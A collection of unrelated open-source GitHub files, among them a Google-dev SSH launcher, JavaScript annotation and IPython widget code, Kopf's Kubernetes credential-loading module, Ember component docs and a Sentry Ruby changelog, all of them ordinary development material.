if [ -z "$GGP_USER" ] || [ -z "$GGP_HOST" ] || [ -z "$GGP_PORT" ] || [ -z "$GGP_KEY_PATH" ] || [ -z "$GGP_KNOWN_HOSTS_PATH" ]; then
echo "Unable to get all necessary information from ggp ssh init"
exit 1
fi
ssh -t -p"$GGP_PORT" -F/dev/null -i"$GGP_KEY_PATH" -oStrictHostKeyChecking=yes -oUserKnownHostsFile="$GGP_KNOWN_HOSTS_PATH" \
-L44766:localhost:44766 -L44765:localhost:44765 "$GGP_USER"@"$GGP_HOST" -- sudo /mnt/developer/OrbitService "$OTHER_ARGS"
| {
"pile_set_name": "Github"
} |
var path = window.location.pathname.split('/');
var exp_id = path[2];
var iteration = path[3];
var exp_type = 'ActiveLearning';
var label_method = 'annotation';
var current_label = null;
var families_list = null;
var num_families = null;
var current_family_index = null;
var instances_list = null;
var confidence_list = null;
var num_instances = null;
var current_instance_index = null;
var annotation_queries = null;
var conf = null;
function getCurrentInstance() {
return instances_list[current_instance_index];
}
function callback() {
conf.interactive = false;
if (!conf.core_conf.auto) {
var current_iteration = currentAnnotationIteration(
exp_id);
conf.interactive = iteration == current_iteration;
}
d3.json(buildQuery('getRcdClusteringId', [exp_id, iteration]),
function(data) {
var clustering_exp_id = data['clustering_exp_id'];
var main = $('#main')[0];
var nav_bars = createDivWithClass('nav_bars', 'col-md-12',
parent_div=main);
displayAnnotationDivision();
var annotations_type = 'individual';
if (clustering_exp_id != -1) {
annotations_type = 'families';
}
displayInstancesToAnnotate(annotations_type, clustering_exp_id);
addShortcuts();
}
);
}
loadConfigurationFile(exp_id, callback);
function displayInstancesToAnnotate(annotations_type, clustering_exp) {
displayNavbars('primary', annotations_type, clustering_exp);
if (annotations_type == 'families') {
var query = buildQuery('getFamiliesInstancesToAnnotate',
[exp_id, iteration, 'all']);
d3.json(query, function(data) {
annotation_queries = data;
families_list = Object.keys(data);
// The families with no annotation query are not displayed.
families_list = families_list.filter(
function nonEmpty(x) {
return annotation_queries[x]['instance_ids'].length > 0
});
num_families = families_list.length;
current_family_index = 0;
updateFamilyNavbar();
});
} else if (annotations_type == 'individual') {
var query = buildQuery('getInstancesToAnnotate',
[exp_id, iteration, label]);
d3.json(query, function(data) {
instances_list = data['instances'];
families_list = null;
num_families = null;
current_family_index = null;
confidence_list = null;
num_instances = instances_list.length;
current_instance_index = 0;
updateInstanceNavbar();
});
}
}
function displayFamilyInstancesToAnnotate(family) {
instances_list = annotation_queries[family]['instance_ids'];
confidence_list = annotation_queries[family]['confidence'];
num_instances = instances_list.length;
current_instance_index = 0;
updateInstanceNavbar();
}
function displayNextInstance() {
if (current_instance_index <= num_instances-2) {
current_instance_index += 1;
updateInstanceNavbar();
} else {
displayNextFamily();
}
}
function displayPrevInstance() {
if (current_instance_index > 0) {
current_instance_index -= 1;
updateInstanceNavbar();
}
}
function displayNextFamily() {
if (current_family_index <= num_families-2) {
current_family_index += 1;
updateFamilyNavbar();
}
}
function displayPrevFamily() {
if (current_family_index > 0) {
current_family_index -= 1;
updateFamilyNavbar();
}
}
function updateFamilyNavbar() {
var iter_family = cleanDiv('iter_family');
iter_family.appendChild(document.createTextNode(
(current_family_index+1) + ' / ' + num_families));
var current_family = cleanDiv('current_family');
var current_family_label = document.createElement('label');
current_family_label.setAttribute('class', 'label label-primary');
current_family_label.appendChild(
document.createTextNode(families_list[current_family_index]));
current_family.appendChild(current_family_label);
displayFamilyInstancesToAnnotate(families_list[current_family_index]);
}
function updateInstanceNavbar() {
var iter_label = cleanDiv('iter_label');
iter_label.appendChild(document.createTextNode(
(current_instance_index+1) + ' / ' + num_instances));
var suggested_family = null;
var suggested_label = null;
if (confidence_list) {
if (confidence_list[current_instance_index] == 'high') {
suggested_family = families_list[current_family_index];
suggested_label = annotation_queries[suggested_family]['label'];
}
}
printInstanceInformation(instances_list[current_instance_index],
proba=null,
suggested_label,
suggested_family);
}
function displayNavbars(type, annotations_type, clustering_exp) {
var nav_bars = cleanDiv('nav_bars');
var panel_body = createPanel('panel-' + type, 'col-md-10',
'Annotation Queries', nav_bars);
var col = createDivWithClass(null, 'col-md-10', panel_body);
if (annotations_type == 'families') {
displayFamiliesBar(col, type, clustering_exp);
}
displayAnnotationQueriesBar(col, type);
var col = createDivWithClass(null, 'col-md-2', panel_body);
clusteringVisualization(col, clustering_exp);
displayEndButton(col);
}
function clusteringVisualization(row, clustering_exp) {
function displayClustering(clustering_exp) {
return function() {
var query = buildQuery('SecuML', [clustering_exp]);
window.open(query);
}
}
var group = createDivWithClass('', 'row', row);
var button = document.createElement('button');
button.setAttribute('class', 'btn btn-default');
button.setAttribute('type', 'button');
button.setAttribute('id', 'button_clustering');
var button_text = document.createTextNode('Display Families');
button.appendChild(button_text);
button.addEventListener('click', displayClustering(clustering_exp));
group.appendChild(button);
}
function displayFamiliesBar(panel_body, type, clustering_exp) {
var col_size = 'col-md-2';
var row = createDivWithClass(null, 'row', parent_div = panel_body);
var annotation_query_family = document.createElement('label');
annotation_query_family.setAttribute('class', col_size + ' control-label');
var family_label = document.createElement('label');
family_label.appendChild(document.createTextNode('Family'))
annotation_query_family.appendChild(family_label);
//annotation_query_family.appendChild(document.createTextNode('Family'));
row.appendChild(annotation_query_family);
var current_family_header = document.createElement('h4');
row.appendChild(current_family_header);
var current_family = document.createElement('label');
current_family.setAttribute('class', col_size + ' control-label');
current_family.setAttribute('id', 'current_family');
current_family_header.appendChild(current_family);
var iter_family = document.createElement('label');
iter_family.setAttribute('class', col_size + ' control-label');
iter_family.setAttribute('id', 'iter_family');
row.appendChild(iter_family);
// Prev / Next buttons
var prev_next_group = createDivWithClass('', 'form-group ' + col_size, row);
// Prev button
var prev_button = document.createElement('button');
prev_button.setAttribute('class', 'btn btn-' + type);
prev_button.setAttribute('type', 'button');
prev_button.setAttribute('id', 'prev_button_family');
var prev_button_text = document.createTextNode('Prev');
prev_button.appendChild(prev_button_text);
prev_button.addEventListener('click', displayPrevFamily);
prev_next_group.appendChild(prev_button);
// Next button
var next_button = document.createElement('button');
next_button.setAttribute('class', 'btn btn-' + type);
next_button.setAttribute('type', 'button');
next_button.setAttribute('id', 'next_button_family');
var next_button_text = document.createTextNode('Next');
next_button.appendChild(next_button_text);
next_button.addEventListener('click', displayNextFamily);
prev_next_group.appendChild(next_button);
}
function displayEndButton(row) {
if (conf.interactive) {
var end_group = document.createElement('h3');
end_group.setAttribute('class', 'row');
row.appendChild(end_group);
var end_button = document.createElement('button');
end_button.setAttribute('class', 'btn btn-primary');
end_button.setAttribute('type', 'button');
end_button.setAttribute('id', 'end_button');
var end_button_text = document.createTextNode('Next Iteration');
end_button.appendChild(end_button_text);
end_button.addEventListener('click', runNextIteration(conf));
end_group.appendChild(end_button);
}
}
function displayAnnotationQueriesBar(panel_body, type) {
var row = createDivWithClass(null, 'row', parent_div = panel_body);
var annotation_query_label = document.createElement('label');
annotation_query_label.setAttribute('class', 'col-md-4 control-label');
annotation_query_label.appendChild(document.createTextNode(
'Annotation Query'));
row.appendChild(annotation_query_label);
var iter_label = document.createElement('label');
iter_label.setAttribute('class', 'col-md-2 control-label');
iter_label.setAttribute('id', 'iter_label');
row.appendChild(iter_label);
// Prev / Next buttons
var prev_next_group = createDivWithClass('', 'form-group col-md-2', row);
// Prev button
var prev_button = document.createElement('button');
prev_button.setAttribute('class', 'btn btn-' + type);
prev_button.setAttribute('type', 'button');
prev_button.setAttribute('id', 'prev_button');
var prev_button_text = document.createTextNode('Prev');
prev_button.appendChild(prev_button_text);
prev_button.addEventListener('click', displayPrevInstance);
prev_next_group.appendChild(prev_button);
// Next button
var next_button = document.createElement('button');
next_button.setAttribute('class', 'btn btn-' + type);
next_button.setAttribute('type', 'button');
next_button.setAttribute('id', 'next_button');
var next_button_text = document.createTextNode('Next');
next_button.appendChild(next_button_text);
next_button.addEventListener('click', displayNextInstance);
prev_next_group.appendChild(next_button);
}
function displayAnnotationDivision() {
var main = $('#main')[0];
// Selected instance - data and annotation
var row = createDivWithClass(null, 'row', parent_div = main);
displayInstancePanel(row);
displayInstanceInformationStructure();
displayAnnotationDiv(suggestion = true);
}
function displayNextInstanceToAnnotate() {
displayNextInstance();
}
| {
"pile_set_name": "Github"
} |
/*
* /MathJax/jax/output/HTML-CSS/fonts/TeX/Typewriter/Regular/CombDiacritMarks.js
*
* Copyright (c) 2009-2014 The MathJax Consortium
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
MathJax.Hub.Insert(MathJax.OutputJax["HTML-CSS"].FONTDATA.FONTS.MathJax_Typewriter,{768:[611,-485,0,-409,-195],769:[611,-485,0,-331,-117],770:[611,-460,0,-429,-97],771:[611,-466,0,-438,-88],772:[577,-500,0,-452,-74],774:[611,-504,0,-446,-79],776:[612,-519,0,-421,-104],778:[619,-499,0,-344,-182],780:[577,-449,0,-427,-99]});MathJax.Ajax.loadComplete(MathJax.OutputJax["HTML-CSS"].fontDir+"/Typewriter/Regular/CombDiacritMarks.js");
| {
"pile_set_name": "Github"
} |
rm profile.png
gprof2dot -f pstats profile.out | dot -Tpng -o profile.png | {
"pile_set_name": "Github"
} |
package org.rrd4j.graph;
import java.awt.Paint;
class VSpan extends Span {
final long start;
final long end;
VSpan(long start, long end, Paint color, LegendText legend) {
super(color, legend);
this.start = start;
this.end = end;
assert(start < end);
}
private boolean checkRange(long v, long min, long max) {
return v >= min && v <= max;
}
void setLegendVisibility(long min, long max, boolean forceLegend) {
legend.enabled = legend.enabled && (forceLegend
|| checkRange(start, min, max)
|| checkRange(end, min, max));
}
}
| {
"pile_set_name": "Github"
} |
package cn.springcloud.service.a.rest;
import com.google.common.collect.ImmutableMap;
import org.apache.commons.lang.StringUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.core.env.Environment;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import java.util.Map;
/**
* Created by saleson on 2017/10/18.
*/
//@RestController
//@RequestMapping("/api/test")
public class TestResource {
@Value("${test.sleepTime:50}")
private long sleepTime = 50;
@Autowired
Environment env;
@RequestMapping(value = "/get", method = RequestMethod.GET)
@ResponseBody
public Map<String, String> testGet(@RequestParam(value = "version", required = false) String version) {
long start = System.currentTimeMillis();
// try {
// Thread.sleep(sleepTime);
// } catch (InterruptedException e) {
// }
return ImmutableMap.of("test", "success.",
"version", StringUtils.defaultIfEmpty(version, ""),
"serverPort", env.getProperty("server.port"),
"usedTime", String.valueOf(System.currentTimeMillis() - start));
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!-- TODO: This screen should be adapted to match its special function, i.e. add images etc. -->
<Include
xmlns="www.team-mediaportal.com/2008/mpf/directx"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
Source="screens\SimpleShowItems.xaml"
>
<Include.Resources>
<ResourceWrapper x:Key="Header_Text" Resource="[Media.ChooseVideoHeader]"/>
<ResourceWrapper x:Key="Cover_Width" Resource="810"/>
</Include.Resources>
</Include>
| {
"pile_set_name": "Github"
} |
"""
Rudimentary piggybacking on the known K8s API clients for authentication.
Kopf is not a client library, and avoids bringing too much logic
for proper authentication, especially all the complex auth-providers.
Instead, it uses the existing clients, triggers the (re-)authentication
in them, and extracts the basic credentials for its own use.
.. seealso::
:mod:`credentials` and :func:`authentication`.
"""
import logging
import warnings
from typing import Any, Union, Optional, Sequence
from kopf.clients import auth
from kopf.structs import credentials
# Keep as constants to make them patchable. Higher priority is more preferred.
PRIORITY_OF_CLIENT: int = 10
PRIORITY_OF_PYKUBE: int = 20
# We keep the official client library auto-login only because it was
# an implied behavior before switching to pykube -- to keep it so (implied).
def login_via_client(
*args: Any,
logger: Union[logging.Logger, logging.LoggerAdapter],
**kwargs: Any,
) -> Optional[credentials.ConnectionInfo]:
try:
import kubernetes.config
except ImportError:
return None
try:
kubernetes.config.load_incluster_config() # cluster env vars
logger.debug("Client is configured in cluster with service account.")
except kubernetes.config.ConfigException as e1:
try:
kubernetes.config.load_kube_config() # developer's config files
logger.debug("Client is configured via kubeconfig file.")
except kubernetes.config.ConfigException as e2:
raise credentials.LoginError(f"Cannot authenticate client neither in-cluster, nor via kubeconfig.")
# We do not even try to understand how it works and why. Just load it, and extract the results.
config = kubernetes.client.Configuration()
# For auth-providers, this method is monkey-patched with the auth-provider's one.
# We need the actual auth-provider's token, so we call it instead of accessing api_key.
# Other keys (token, tokenFile) also end up being retrieved via this method.
header: Optional[str] = config.get_api_key_with_prefix('authorization')
parts: Sequence[str] = header.split(' ', 1) if header else []
scheme, token = ((None, None) if len(parts) == 0 else
(None, parts[0]) if len(parts) == 1 else
(parts[0], parts[1])) # RFC-7235, Appendix C.
# Interpret the config object for our own minimalistic credentials.
# Note: kubernetes client has no concept of a "current" context's namespace.
return credentials.ConnectionInfo(
server=config.host,
ca_path=config.ssl_ca_cert, # can be a temporary file
insecure=not config.verify_ssl,
username=config.username or None, # an empty string when not defined
password=config.password or None, # an empty string when not defined
scheme=scheme,
token=token,
certificate_path=config.cert_file, # can be a temporary file
private_key_path=config.key_file, # can be a temporary file
priority=PRIORITY_OF_CLIENT,
)
# Pykube login is mandatory. If it fails, the framework will not run at all.
def login_via_pykube(
*args: Any,
logger: Union[logging.Logger, logging.LoggerAdapter],
**kwargs: Any,
) -> Optional[credentials.ConnectionInfo]:
try:
import pykube
except ImportError:
return None
# Read the pykube config either way for later interpretation.
# DEPRECATED: Previously, in some cases, get_pykube_cfg() was monkey-patched
# to inject custom authentication methods. Support these hacks if possible.
config: pykube.KubeConfig
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
config = auth.get_pykube_cfg()
logger.debug("Pykube is configured via monkey-patched get_pykube_cfg().")
except NotImplementedError:
try:
config = pykube.KubeConfig.from_service_account()
logger.debug("Pykube is configured in cluster with service account.")
except FileNotFoundError:
try:
config = pykube.KubeConfig.from_file()
logger.debug("Pykube is configured via kubeconfig file.")
except (pykube.PyKubeError, FileNotFoundError):
raise credentials.LoginError(f"Cannot authenticate pykube "
f"neither in-cluster, nor via kubeconfig.")
# We don't know how this token will be retrieved, we just get it afterwards.
provider_token = None
if config.user.get('auth-provider'):
api = pykube.HTTPClient(config)
api.get(version='', base='/') # ignore the response status
provider_token = config.user.get('auth-provider', {}).get('config', {}).get('access-token')
# Interpret the config object for our own minimalistic credentials.
ca: Optional[pykube.config.BytesOrFile] = config.cluster.get('certificate-authority')
cert: Optional[pykube.config.BytesOrFile] = config.user.get('client-certificate')
pkey: Optional[pykube.config.BytesOrFile] = config.user.get('client-key')
return credentials.ConnectionInfo(
server=config.cluster.get('server'),
ca_path=ca.filename() if ca else None, # can be a temporary file
insecure=config.cluster.get('insecure-skip-tls-verify'),
username=config.user.get('username'),
password=config.user.get('password'),
token=config.user.get('token') or provider_token,
certificate_path=cert.filename() if cert else None, # can be a temporary file
private_key_path=pkey.filename() if pkey else None, # can be a temporary file
default_namespace=config.namespace,
priority=PRIORITY_OF_PYKUBE,
)
| {
"pile_set_name": "Github"
} |
To define a component, run:
```bash
ember generate component my-component-name
```
Components must have at least one dash in their name. So `blog-post` is an acceptable
name, and so is `audio-player-controls`, but `post` is not. This prevents clashes with
current or future HTML element names, aligns Ember components with the W3C [Custom
Elements](https://dvcs.w3.org/hg/webcomponents/raw-file/tip/spec/custom/index.html)
spec, and ensures Ember detects the components automatically.
A sample component template could look like this:
```handlebars {data-filename=app/templates/components/blog-post.hbs}
<article class="blog-post">
<h1>{{title}}</h1>
<p>{{yield}}</p>
<p>Edit title: {{input type="text" value=title}}</p>
</article>
```
Given the above template, you can now use the `{{blog-post}}` component:
```handlebars {data-filename=app/templates/index.hbs}
{{#each model as |post|}}
{{#blog-post title=post.title}}
{{post.body}}
{{/blog-post}}
{{/each}}
```
Its model is populated in `model` hook in the route handler:
```javascript {data-filename=app/routes/index.js}
import Ember from 'ember';
export default Ember.Route.extend({
model() {
return this.get('store').findAll('post');
}
});
```
Each component, under the hood, is backed by an element. By default
Ember will use a `<div>` element to contain your component's template.
To learn how to change the element Ember uses for your component, see
[Customizing a Component's
Element](./customizing-a-components-element).
## Defining a Component Subclass
Often times, your components will just encapsulate certain snippets of
Handlebars templates that you find yourself using over and over. In
those cases, you do not need to write any JavaScript at all. Define
the Handlebars template as described above and use the component that is
created.
If you need to customize the behavior of the component you'll
need to define a subclass of [`Ember.Component`][1]. For example, you would
need a custom subclass if you wanted to change a component's element,
respond to actions from the component's template, or manually make
changes to the component's element using JavaScript.
[1]: https://api.emberjs.com/classes/Ember.Component.html
Ember knows which subclass powers a component based on its filename. For
example, if you have a component called `blog-post`, you would create a
file at `app/components/blog-post.js`. If your component was called
`audio-player-controls`, the file name would be at
`app/components/audio-player-controls.js`.
## Dynamically rendering a component
The [`{{component}}`][2] helper can be used to defer the selection of a component to
run time. The `{{my-component}}` syntax always renders the same component,
while using the `{{component}}` helper allows choosing a component to render on
the fly. This is useful in cases where you want to interact with different
external libraries depending on the data. Using the `{{component}}` helper would
allow you to keep different logic well separated.
The first parameter of the helper is the name of a component to render, as a
string. So `{{component 'blog-post'}}` is the same as using `{{blog-post}}`.
The real value of [`{{component}}`][2] comes from being able to dynamically pick
the component being rendered. Below is an example of using the helper as a
means of choosing different components for displaying different kinds of posts:
[2]: https://api.emberjs.com/classes/Ember.Templates.helpers.html#method_component
```handlebars {data-filename=app/templates/components/foo-component.hbs}
<h3>Hello from foo!</h3>
<p>{{post.body}}</p>
```
```handlebars {data-filename=app/templates/components/bar-component.hbs}
<h3>Hello from bar!</h3>
<div>{{post.author}}</div>
```
```javascript {data-filename=app/routes/index.js}
import Ember from 'ember';
export default Ember.Route.extend({
model() {
return this.get('store').findAll('post');
}
});
```
```handlebars {data-filename=app/templates/index.hbs}
{{#each model as |post|}}
{{!-- either foo-component or bar-component --}}
{{component post.componentName post=post}}
{{/each}}
```
When the parameter passed to `{{component}}` evaluates to `null` or `undefined`,
the helper renders nothing. When the parameter changes, the currently rendered
component is destroyed and the new component is created and brought in.
Picking different components to render in response to the data allows you to
have different template and behavior for each case. The `{{component}}` helper
is a powerful tool for improving code modularity.
| {
"pile_set_name": "Github"
} |
version https://git-lfs.github.com/spec/v1
oid sha256:1effcb8ef65b662b2c370863507a04b103a51f9109fe9b0137b1b362cfdcede7
size 3272
| {
"pile_set_name": "Github"
} |
//----------------------------------------------------------------------------
// Copyright (C) 2013 The IPython Development Team
//
// Distributed under the terms of the BSD License. The full license is in
// the file COPYING, distributed as part of this software.
//----------------------------------------------------------------------------
//============================================================================
// ContainerWidget
//============================================================================
/**
* @module IPython
* @namespace IPython
**/
define(["widgets/js/widget"], function(WidgetManager) {
var ContainerView = IPython.DOMWidgetView.extend({
render: function(){
// Called when view is rendered.
this.$el.addClass('widget-container')
.addClass('vbox');
this.children={};
this.update_children([], this.model.get('_children'));
this.model.on('change:_children', function(model, value, options) {
this.update_children(model.previous('_children'), value);
}, this);
this.update();
},
update_children: function(old_list, new_list) {
// Called when the children list changes.
this.do_diff(old_list,
new_list,
$.proxy(this.remove_child_model, this),
$.proxy(this.add_child_model, this));
},
remove_child_model: function(model) {
// Called when a model is removed from the children list.
this.child_views[model.id].remove();
this.delete_child_view(model);
},
add_child_model: function(model) {
// Called when a model is added to the children list.
var view = this.create_child_view(model);
this.$el.append(view.$el);
},
update: function(){
// Update the contents of this view
//
// Called when the model is changed. The model may have been
// changed by another view or by a state update from the back-end.
return ContainerView.__super__.update.apply(this);
},
});
WidgetManager.register_widget_view('ContainerView', ContainerView);
var PopupView = IPython.DOMWidgetView.extend({
render: function(){
// Called when view is rendered.
var that = this;
this.children={};
this.$el.on("remove", function(){
that.$window.remove();
});
this.$window = $('<div />')
.addClass('modal widget-modal')
.appendTo($('#notebook-container'))
.mousedown(function(){
that.bring_to_front();
});
// Set the elements array since the this.$window element is not child
// of this.$el and the parent widget manager or other widgets may
// need to know about all of the top-level widgets. The IPython
// widget manager uses this to register the elements with the
// keyboard manager.
this.additional_elements = [this.$window]
this.$title_bar = $('<div />')
.addClass('popover-title')
.appendTo(this.$window)
.mousedown(function(){
that.bring_to_front();
});
this.$close = $('<button />')
.addClass('close icon-remove')
.css('margin-left', '5px')
.appendTo(this.$title_bar)
.click(function(){
that.hide();
event.stopPropagation();
});
this.$minimize = $('<button />')
.addClass('close icon-arrow-down')
.appendTo(this.$title_bar)
.click(function(){
that.popped_out = !that.popped_out;
if (!that.popped_out) {
that.$minimize
.removeClass('icon-arrow-down')
.addClass('icon-arrow-up');
that.$window
.draggable('destroy')
.resizable('destroy')
.removeClass('widget-modal modal')
.addClass('docked-widget-modal')
.detach()
.insertBefore(that.$show_button);
that.$show_button.hide();
that.$close.hide();
} else {
that.$minimize
.addClass('icon-arrow-down')
.removeClass('icon-arrow-up');
that.$window
.removeClass('docked-widget-modal')
.addClass('widget-modal modal')
.detach()
.appendTo($('#notebook-container'))
.draggable({handle: '.popover-title', snap: '#notebook, .modal', snapMode: 'both'})
.resizable()
.children('.ui-resizable-handle').show();
that.show();
that.$show_button.show();
that.$close.show();
}
event.stopPropagation();
});
this.$title = $('<div />')
.addClass('widget-modal-title')
.html(" ")
.appendTo(this.$title_bar);
this.$body = $('<div />')
.addClass('modal-body')
.addClass('widget-modal-body')
.addClass('widget-container')
.addClass('vbox')
.appendTo(this.$window);
this.$show_button = $('<button />')
.html(" ")
.addClass('btn btn-info widget-modal-show')
.appendTo(this.$el)
.click(function(){
that.show();
});
this.$window.draggable({handle: '.popover-title', snap: '#notebook, .modal', snapMode: 'both'});
this.$window.resizable();
this.$window.on('resize', function(){
that.$body.outerHeight(that.$window.innerHeight() - that.$title_bar.outerHeight());
});
this.$el_to_style = this.$body;
this._shown_once = false;
this.popped_out = true;
this.update_children([], this.model.get('_children'));
this.model.on('change:_children', function(model, value, options) {
this.update_children(model.previous('_children'), value);
}, this);
this.update();
},
hide: function() {
// Called when the modal hide button is clicked.
this.$window.hide();
this.$show_button.removeClass('btn-info');
},
show: function() {
// Called when the modal show button is clicked.
this.$show_button.addClass('btn-info');
this.$window.show();
if (this.popped_out) {
this.$window.css("positon", "absolute");
this.$window.css("top", "0px");
this.$window.css("left", Math.max(0, (($('body').outerWidth() - this.$window.outerWidth()) / 2) +
$(window).scrollLeft()) + "px");
this.bring_to_front();
}
},
bring_to_front: function() {
// Make the modal top-most, z-ordered about the other modals.
var $widget_modals = $(".widget-modal");
var max_zindex = 0;
$widget_modals.each(function (index, el){
max_zindex = Math.max(max_zindex, parseInt($(el).css('z-index')));
});
// Start z-index of widget modals at 2000
max_zindex = Math.max(max_zindex, 2000);
$widget_modals.each(function (index, el){
$el = $(el);
if (max_zindex == parseInt($el.css('z-index'))) {
$el.css('z-index', max_zindex - 1);
}
});
this.$window.css('z-index', max_zindex);
},
update_children: function(old_list, new_list) {
// Called when the children list is modified.
this.do_diff(old_list,
new_list,
$.proxy(this.remove_child_model, this),
$.proxy(this.add_child_model, this));
},
remove_child_model: function(model) {
// Called when a child is removed from children list.
this.child_views[model.id].remove();
this.delete_child_view(model);
},
add_child_model: function(model) {
// Called when a child is added to children list.
var view = this.create_child_view(model);
this.$body.append(view.$el);
},
update: function(){
// Update the contents of this view
//
// Called when the model is changed. The model may have been
// changed by another view or by a state update from the back-end.
var description = this.model.get('description');
if (description.trim().length === 0) {
this.$title.html(" "); // Preserve title height
} else {
this.$title.text(description);
}
var button_text = this.model.get('button_text');
if (button_text.trim().length === 0) {
this.$show_button.html(" "); // Preserve button height
} else {
this.$show_button.text(button_text);
}
if (!this._shown_once) {
this._shown_once = true;
this.show();
}
return PopupView.__super__.update.apply(this);
},
_get_selector_element: function(selector) {
// Get an element view a 'special' jquery selector. (see widget.js)
//
// Since the modal actually isn't within the $el in the DOM, we need to extend
// the selector logic to allow the user to set css on the modal if need be.
// The convention used is:
// "modal" - select the modal div
// "modal [selector]" - select element(s) within the modal div.
// "[selector]" - select elements within $el
// "" - select the $el_to_style
if (selector.substring(0, 5) == 'modal') {
if (selector == 'modal') {
return this.$window;
} else {
return this.$window.find(selector.substring(6));
}
} else {
return PopupView.__super__._get_selector_element.apply(this, [selector]);
}
},
});
WidgetManager.register_widget_view('PopupView', PopupView);
});
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2005 DMTF. All rights reserved.
[Version ( "2.8.0" ),
UMLPackagePath ( "CIM::IPsecPolicy" ),
Description (
"SARule is a base class for defining IKE and IPsec Rules. "
"Although concrete (because it subclasses from a concrete "
"class), it is not intended to be instantiated. It defines a "
"common connection point for associating conditions and actions "
"for both types of rules. Note that each valid PolicyGroup "
"containing SARules MUST use a unique priority number for the "
"Rule in the aggregation, PolicySetComponent.Priority." ),
MappingStrings { "IPSP Policy Model.IETF|SARule" }]
class CIM_SARule : CIM_PolicyRule {
[Description (
"LimitNegotiation is used as part of processing either a "
"key exchange or IPsec Rule. Before proceeding with "
"either a phase 1 or a phase 2 negotiation, this property "
"is checked to determine if the negotiation role of the "
"Rule matches that defined for the negotiation being "
"undertaken (e.g., Initiator, Responder, or Both). If "
"this check fails, then the negotiation is stopped. Note "
"that this only applies to new negotiations and has no "
"effect on either renegotiation or refresh operations "
"with peers for which an established Security Association "
"already exists." ),
ValueMap { "1", "2", "3" },
Values { "Initiator-Only", "Responder-Only", "Either" },
MappingStrings {
"IPSP Policy Model.IETF|SARule.LimitNegotiation" }]
uint16 LimitNegotiation;
};
| {
"pile_set_name": "Github"
} |
# Changelog
## 3.1.1
**Feature**
- Add request id to headers if exists ([#1033](https://github.com/getsentry/sentry-ruby/pull/1033))
- Allow blocks on user_context ([#1023](https://github.com/getsentry/sentry-ruby/pull/1023))
- Enable configurable rack environment recorded parameters ([#860](https://github.com/getsentry/sentry-ruby/pull/860))
- Remove ActiveJob keys for both Sidekiq and DelayedJob ([#898](https://github.com/getsentry/sentry-ruby/pull/898))
**Fix**
- Remove circular dependency in transport/http.rb ([#1035](https://github.com/getsentry/sentry-ruby/pull/1035))
## 3.1.0
**Feature**
- Exclude all 4xx Rails errors ([#1004](https://github.com/getsentry/raven-ruby/pull/1004))
See the full list [here](https://github.com/getsentry/raven-ruby/blob/master/lib/raven/configuration.rb#L198-L219)
- Add some error context in `transport_failure_callback` ([#1003](https://github.com/getsentry/raven-ruby/pull/1003))
Before:
```ruby
config.transport_failure_callback = lambda { |event|
AdminMailer.email_admins("Oh god, it's on fire!", event).deliver_later
}
```
After:
```ruby
config.transport_failure_callback = lambda { |event, error|
AdminMailer.email_admins("Oh god, it's on fire because #{error.message}!", event).deliver_later
}
```
- Support cleaning up exception backtrace with customized backtrace_cleaner ([#1011](https://github.com/getsentry/raven-ruby/pull/1011))
The new config `backtrace_cleanup_callback` takes a lambda/proc object (default is `nil`) and will be called with exception's backtrace
```ruby
Raven.configure do |config|
config.backtrace_cleanup_callback = lambda do |backtrace|
Rails.backtrace_cleaner.clean(backtrace)
end
end
```
And with the Rails integration, it'll automatically use a customized `Raven::Rails::BacktraceCleaner` to clean up exception's backtrace. It's basically Rails 6's [backtrace cleaner](https://github.com/rails/rails/blob/master/railties/lib/rails/backtrace_cleaner.rb) but without silencers.
The main reason to add this cleaner is to remove template methods from the trace, e.g.
```
app/views/welcome/view_error.html.erb in _app_views_welcome_view_error_html_erb__2807287320172182514_65600 at line 1
```
will become
```
app/views/welcome/view_error.html.erb at line 1
```
This can help Sentry group issues more accurately. See [#957](https://github.com/getsentry/raven-ruby/issues/957) for more information about this.
If you don't want this change, you can disable it with:
```ruby
Raven.configure do |config|
config.backtrace_cleanup_callback = nil
end
```
- Make dsn value accessable from config ([#1012](https://github.com/getsentry/raven-ruby/pull/1012))
You can now access the dsn value via `Raven.configuration.dsn`
**Deprecation**
- Deprecate dasherized filenames ([#1006](https://github.com/getsentry/raven-ruby/pull/1006))
If you're using
```ruby
gem 'sentry-raven', require: 'sentry-raven-without-integrations'
# or
require "sentry-raven-without-integrations"
```
you will start seeing deprecation warnings. Please change them into
```ruby
gem 'sentry-raven', require: 'sentry_raven_without_integrations'
# or
require "sentry_raven_without_integrations"
```
- Unify breadcrumb loggers activation ([#1016](https://github.com/getsentry/raven-ruby/pull/1016))
Currently, we activate our breadcrumb loggers differently:
```ruby
require "raven/breadcrumbs/sentry_logger"
Raven.configuration.rails_activesupport_breadcrumbs = true
```
It's not a nice user interface, so this PR adds a new configuration
option `breadcrumbs_logger` to improve this:
```ruby
Raven.configuration.breadcrumbs_logger = :sentry_logger
Raven.configuration.breadcrumbs_logger = :active_support_logger
Raven.configuration.breadcrumbs_logger = [:sentry_logger, :active_support_logger]
```
Please migrate to the new activation apporach, otherwise you'll see depraction warnings. And old ones will be dropped in version 4.0.
**Refactor**
- Accept non-string message in Event.from_exception ([#1005](https://github.com/getsentry/raven-ruby/pull/1005))
- Refactor event initialization ([#1010](https://github.com/getsentry/raven-ruby/pull/1010))
- Refactor sidekiq integration ([#1019](https://github.com/getsentry/raven-ruby/pull/1019))
**Fix**
- Replace sys_command usages in context.rb ([#1017](https://github.com/getsentry/raven-ruby/pull/1017))
- Fix merge error from rack-timeout raven_context on old releases ([#1007](https://github.com/getsentry/raven-ruby/pull/1007))
- Return value of `rescue_with_handler` when intercepting ActiveJob exceptions ([#1027](https://github.com/getsentry/raven-ruby/pull/1027))
## 3.0.4
